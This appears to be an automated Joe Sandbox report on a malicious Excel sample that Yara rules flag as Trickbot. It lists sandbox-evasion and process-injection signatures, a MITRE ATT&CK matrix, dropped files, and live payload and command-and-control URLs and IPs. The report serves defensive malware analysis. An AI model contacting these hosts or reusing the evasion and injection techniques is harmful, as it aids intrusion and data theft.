                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Windows\System32\wermgr.exe | RDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F527C7F7B90h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F527C7EFA26h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Windows\System32\wermgr.exe | Last function: Thread delayed
                Source: C:\Windows\System32\wermgr.exe | Last function: Thread delayed
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E85B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E857DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                Allocates memory in foreign processes
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\wermgr.exe base: FFE193F8
                Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmp | Binary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exe | Queries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                Yara detected Trickbot
                Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
                Yara detected Trickbot
                Source: Yara match | File source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match | File source: 4.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                Yara detected Trickbot
                Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
                Yara detected Trickbot
                Source: Yara match | File source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match | File source: 4.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSSystem Network Configuration Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Behavior Graph ID: 355606 | Sample: SecuriteInfo.com.Exploit.Si... | Startdate: 20/02/2021 | Architecture: WINDOWS | Score: 100
                Graph rendered as text (process tree with the signatures, dropped files and network contacts attached to each node):
                Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 11 other signatures
                EXCEL.EXE (84 registry values, 41 files created) started
                  DNS/IP: chipmania.it 185.81.0.78, ports 49165, 80, SERVERPLAN-ASIT, Italy; www.chipmania.it
                  Dropped: C:\Users\user\BASE.BABAA (PE32); C:\Users\user\AppData\Local\...\10[1].jjkes (PE32)
                  Signatures: Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
                  started rundll32.exe
                    started rundll32.exe: Writes to foreign memory regions; Allocates memory in foreign processes
                      started wermgr.exe: Tries to detect virtualization through RDTSC time measurements; Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                      started wermgr.exe (4 registry values, 2 files created): contacts 108.170.20.75, 443, SSASN2US, United States; 200.52.147.93, 443, 49170, RedesyTelecomunicacionesHN, Honduras; 142.202.191.164, 443, 49166, DYNUUS, Reserved


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | 11% | Virustotal |

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | 11% | Metadefender |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | 6% | ReversingLabs | Win32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA | 11% | Metadefender |
                C:\Users\user\BASE.BABAA | 6% | ReversingLabs | Win32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                Source | Detection | Scanner | Label
                chipmania.it | 1% | Virustotal |
                www.chipmania.it | 2% | Virustotal |

                URLs

                Source | Detection | Scanner | Label
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/ | 0% | Avira URL Cloud | safe
                http://www.chipmania.it/mails/open.php | 5% | Virustotal |
                http://www.chipmania.it/mails/open.php | 100% | Avira URL Cloud | malware
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file// | 0% | Avira URL Cloud | safe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                http://www.%s.comPA | 0% | URL Reputation | safe
                http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/ | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                chipmania.it | 185.81.0.78 | true | false | | unknown
                www.chipmania.it | unknown | unknown | false | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://www.chipmania.it/mails/open.php | true | Virustotal: 5%; Avira URL Cloud: malware | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | false | | high
                http://www.windows.com/pctv. | wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | false | | high
                http://investor.msn.com | rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | false | | high
                http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | false | | high
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmp | false | | high
                http://crl.entrust.net/server1.crl0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | | high
                http://ocsp.entrust.net03 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | false | | high
                https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/ | wermgr.exe, 00000006.00000002.2343779349.000000000024A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file// | wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://www.%s.comPA | wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
                http://www.diginotar.nl/cps/pkioverheid0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | false | | high
                http://ocsp.entrust.net0D | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                https://secure.comodo.com/CPS0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | | high
                http://servername/isapibackend.dll | wermgr.exe, 00000006.00000002.2349584225.0000000034050000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://crl.entrust.net/2048ca.crl0 | wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | false | | high
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/ | wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.202.191.164 | unknown | Reserved | 398019 | DYNUUS | true
108.170.20.75 | unknown | United States | 20454 | SSASN2US | true
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true

                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 355606
Start date: 20.02.2021
Start time: 03:16:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@9/11@1/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 7.6% (good quality ratio 4.8%)
• Quality average: 58.5%
• Quality standard deviation: 46.4%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
03:16:38 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
03:16:38 | API Interceptor | 7x Sleep call for process: wermgr.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.1476.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.2804.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.18554.xls | malicious |
142.202.191.164 | Sign-488964532_2104982999.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.22173.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.28224.xls | malicious |
142.202.191.164 | Sign_1136845514-2138034493.xls | malicious |
142.202.191.164 | Sign_1229872171-1113140666(1).xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10048.926.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious |
142.202.191.164 | upload-1015096714-954471831.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Exploit.Siggen3.10048.18578.xls | malicious |
142.202.191.164 | SecuriteInfo.com.Heur.31861.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.1181.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.21235.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.1138.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.18554.xls | malicious |
108.170.20.75 | Sign-488964532_2104982999.xls | malicious |
108.170.20.75 | Sign-707465831_1420670581.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.28366.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.28224.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Heur.7735.xls | malicious |
108.170.20.75 | Sign_1136845514-2138034493.xls | malicious |
108.170.20.75 | Sign_77624265-298090224.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious |
108.170.20.75 | upload-1015096714-954471831.xls | malicious |
108.170.20.75 | SecuriteInfo.com.Exploit.Siggen3.10048.18578.xls | malicious |
108.170.20.75 | att-1664057138.xls | malicious |
108.170.20.75 | att-226609285.xls | malicious |
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1476.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1181.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.21235.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.15875.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.21759.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.2804.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1138.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.11266.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.18554.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-636.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-92793351_1597657581.xls | malicious | www.chipmania.it/mails/open.php

                                                                                                            Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            DYNUUSSecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.926.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            0944mr8IJ0.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.151
                                                                                                            3H5uZw7X3l.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.151
                                                                                                            ezy132y3M9.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.186
                                                                                                            RedesyTelecomunicacionesHNSecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18756.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.30904.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            P4fZLHrU6d.exeGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SSASN2USSecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            kAZyIwSSsf.exeGet hashmaliciousBrowse
                                                                                                            • 108.170.20.72
                                                                                                            SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.7735.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
 | Sign_1136845514-2138034493.xls | malicious | 108.170.20.75
 | Sign_77624265-298090224.xls | malicious | 108.170.20.75
 | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 108.170.20.75
 | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious | 108.170.20.75
 | DocuSign_1618411389_250497852.xls | malicious | 108.170.20.72
 | DocuSign_1329880746_256921564.xls | malicious | 108.170.20.72
 | upload-1015096714-954471831.xls | malicious | 108.170.20.75
 | SecuriteInfo.com.Exploit.Siggen3.10048.18578.xls | malicious | 108.170.20.75
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious | 185.81.0.78
